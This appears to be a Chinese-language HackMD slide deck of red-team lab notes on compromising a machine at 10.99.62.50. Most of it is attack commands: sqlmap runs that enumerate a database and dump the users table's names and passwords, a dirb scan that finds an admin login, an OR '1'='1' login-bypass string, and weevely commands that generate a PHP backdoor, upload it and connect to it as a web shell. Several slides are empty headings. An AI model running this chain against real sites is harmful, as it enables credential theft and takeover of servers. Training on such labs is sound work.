{%hackmd theme-dark %}
<!-- [TOC] -->
# 0425-Red-Team-打機器(SQL-Inj)
---
## 找注入點:測試id

----
## 找注入點:測試id

----
## 找到注入點 -> 起手式:找Database
```sql=
sqlmap -u 10.99.62.50/site/content?id=2 --dbs
```

----
## 第二式:找tables
```sql\=
sqlmap -u 10.99.62.50/site/content?id=2 -D information_schema --tables
```

對users非常有興趣
----
## 第三式:找columns
```sql=
sqlmap -u 10.99.62.50/site/content?id=2 -D blog_vulnerability -T users --columns
```

----
## Dump 出密碼
```sql=
sqlmap -u 10.99.62.50/site/content?id=2 -D blog_vulnerability -T users -C name, password --dump --batch
```

---
## dirb http://10.99.62.50
- 找到子目錄
- /admin/login
---
## Login

---
## Sql-Injection Combo
```sql=
1' OR '1'='1 --
```
----
## 登入

----
## 上傳功能

----
### php reverse shell?
- Local是Server,等待連線 Victim當Client
### weevely?
- Local是Client, Victim當Server等待連線
----
## weevely 使用方法
1. 生Payload: weevely generate [password] [path]
```sql=
weevely genetate 1234 ./reverse_shell.php
```
2. 連線: weevely [網址] [password]
```sql=
weevely https://10.99.62.50/upload/imgs/content/44/backdoor-test.php 1234
```
----
## Get Shell

---
## Nmap

---
{"metaMigratedAt":"2023-06-15T07:10:55.050Z","metaMigratedFrom":"YAML","title":"0425-Red-Team-打機器","breaks":true,"contributors":"[{\"id\":\"6a610fe4-c967-47b5-84b7-1d26faef3c47\",\"add\":1831,\"del\":132}]"}